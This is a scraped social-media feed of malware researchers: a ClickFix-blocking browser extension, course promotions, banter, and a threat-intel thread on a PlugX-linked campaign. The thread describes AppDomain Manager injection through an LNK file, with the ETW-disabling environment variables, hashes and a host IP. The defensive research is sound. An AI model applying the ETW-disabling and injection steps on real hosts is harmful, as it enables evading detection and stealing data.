ExploitedSite

🛡️ Launched BinHex.Ninja Security – browser extension blocking ClickFix attacks ✅ Real-time detection ✅ Clipboard protection ✅ Privacy-first & actively developed 📥 binhex.ninja/extension.html 📧 Feedback: re.team@binhex.ninja 🙏 Thanks to all who share anonymous data

Recently my RE workflow moved into sandboxed VMs where agents have full control over the environment. I needed an MCP server that runs headless in the same sandbox and exposes way more of the #BinaryNinja API than others. Here's the release: github.com/mrphrazer/bina…

@struppigel Damn I might have missed it! All good! :)

@ExploitedSite It's not Friday anymore

Black Friday offers: ➡️60% off for 2 malware analysis courses (beginner & intermediate) ➡️Or 40% off for single course …nalysis-for-hedgehogs.learnworlds.com/courses

@struppigel Any plans of putting the course/bundle on discount for black friday/cyber monday! :)

My intermediate level malware analysis course is there. 60% off for the next two weeks. …nalysis-for-hedgehogs.learnworlds.com/course/interme…

@EvilSecOfficial @RussianPanda9xx I mean if you compare company track record to employee track record, that’s sort of unfair as well ain’t it?

@RussianPanda9xx You interviewed someone from.... Arctic Wolf? A company that has a worse track record than Cylance? (Impressive that Cylance isn't the worst anymore).. They still struggle with Mimikatz from 7 years ago, asking them anything recent is just purely unfair.

Honey, wake up.. We interviewed a Senior Threat Researcher at a large MDR company and asked YOUR questions 🐺 Have recommendation on WHO we should interview next? Drop a comment below 👇 youtube.com/watch?v=UXmgVX…

🛡️ Deep dive into ClickFix attack protection! Just demoed the ClickFix Security extension - created by binhex.ninja / @ExploitedSite . 🔗 Extension: chromewebstore.google.com/detail/binhexn… 📖 Analysis: binhex.ninja/extension.html In this demo, we: ✅ Walk through its multi-layer defense system ✅ Break down dual-world execution (ISOLATED + MAIN) ✅ Show 5 layers of clipboard protection catching attacks live ✅ Analyze live ClickFix sites blocking malicious payloads instantly 🔍 Detects 100+ attack patterns: • Base64 PowerShell • curl | bash payloads • WSH exploitation • Fake CAPTCHA tricks • Clipboard hijacking 💡 How ClickGrab fits in: github.com/MHaggis/ClickG… ClickGrab hunts campaigns + extracts IOCs BinHex.Ninja blocks them in-browser Huge shout-out to @ExploitedSite for the amazing work and the time spent building and sharing this with the community. 👏 Together = full ClickFix defense pipeline 🔄 📺 youtu.be/XuXsfg-yEts

@M_haggis Thank you for the kind words! I’m currently working on fixes, updates, and enhancements to address various browser-based threats. The support from everyone so far has been amazing. The plan is to keep it community-driven with a focus on helping everyone stay safer online.

This is awesome - Video inbound on it's use and breakdown of how it works.

@Protoge420 @RussianPanda9xx Red Herring!!!! 😛

@ExploitedSite @RussianPanda9xx SUSSSSSS

Check this tool that my buddy wrote that blocks ClickFix attacks. Promise, it’s not a clipper malware, I reversed the extension myself 🤣

@OmniG7 @RussianPanda9xx RE API Key -

@Protoge420 @RussianPanda9xx Yeah, the API key is used to tell the server - “Hey I’m Chrome, please do the key exchange with me” or “Hey I’m Firefox, please do the key exchange with me”. Its not a key-key in the grand scheme of things, more like an identifier of browser type 😃

@RussianPanda9xx hardcoded API keys are there in one of the files :)

@IndiGo6E No update so far on this. Case reference number - 26102775. Not even sure if I’ll get one before travel dates.

@ExploitedSite Hi, kindly allow us some time, our team will connect with you shortly. ~Malishka

@JustWantToQ1 @_JohnHammond @HuntressLabs Well I’m glad they weren’t torrenting, else they’d be served a notice. But TA ops - that’s acceptable as per EULA.

@_JohnHammond @HuntressLabs This is a government agency ASN and block. LOL

A threat actor installed Huntress. ... a hysterical mistake on their part, giving us first-hand insight to their tooling, workflow & routine. Phishing infra, stealer logs, Telegram+dark web sites, AI... Hilarious goldmine of cybercrime deets with a front row seat: huntress.com/blog/rare-look…

@RussianPanda9xx After 2025 years and millions more of evolution, humans finally realized that buzzwords like EDR, XDR, and zero trust actually have real powers. Mind blown.

Funny how folks complain about EDR “seeing too much” … That visibility is literally what stops you from waking up to ransomware notes at 3AM

@GettinsMathew @BSidesDublin @CyberIreland I won’t be able to attend and have 2x spares

Hi guys, does anyone have a spare ticket going for Bsides in Dublin next weekend @BSidesDublin @CyberIreland 🍀🍀🍀

Unlock forbidden Windows knowledge! 🤫💻 Find the PEB through truly undetected means and pop calculator 💥 The non-golf form will be available below 👇 #redteamtips #windowsinternals #rust

My new article, "Writing a Full Windows ARM64 Debugger for Reverse Engineering," covers the topic in detail, including its internals and the core differences between Windows on Intel and ARM64: keowu.re/posts/Writing-…

@RussianPanda9xx Lmfao

It was not intentional, I promise

@DaveLikesMalwre It was all you @DaveLikesMalwre! I barely just found the blog highlighting the technique 🫡

Digging into the Injection we can observe the use of COMPlus_ETWEnabled=0 🥷 - This aims to disable ETW on the host in order to allow for the DLL load which is defined in the next variable APPDOMAIN_MANAGER_ASM=Transaction 💣(Referencing the Transaction.dll seen above) Followed by the function call to execute at run time APPDOMAIN_MANAGER_TYPE=MicroTransact (MicroTransact is contained inside the Transaction DLL seen below) XREF - Attack method covered by @rapid7 -> https://www.rapid7[.]com/blog/post/2023/05/05/appdomain-manager-injection-new-techniques-for-red-teams/ CC: Thanks @ExploitedSite for providing the blog find and aiding in the investigation!

📁AppDomain Manager Injection via LNK 1/🧵 Today I found an interesting campaign utilising a double extensioned LNK file to perform AppDomain Manager injection to deliver an environment variable stealer mimicking @Netskope domains... The PE Resource parent is a PlugX File File Hash: 35120006e3d4621f081077991096bfccc5f8a12f8ce9dafa5bcb70304bd02202 OpenDir IP: http://34.224.90[.]25/ Hosted Files: - Netskope_Signup.docx.lnk (b9d4c0ea77e598b45015e36624d8fbe4) - /Documents/Netskope.exe (Microsoft.Uev.SyncController.exe Renamed - acf59b4425a04f81aafc1cb83c2194ae) - /Documents/Transaction.dll (Env var Stealer - 2881c62e11f213d6ef81e2d4f1c50790)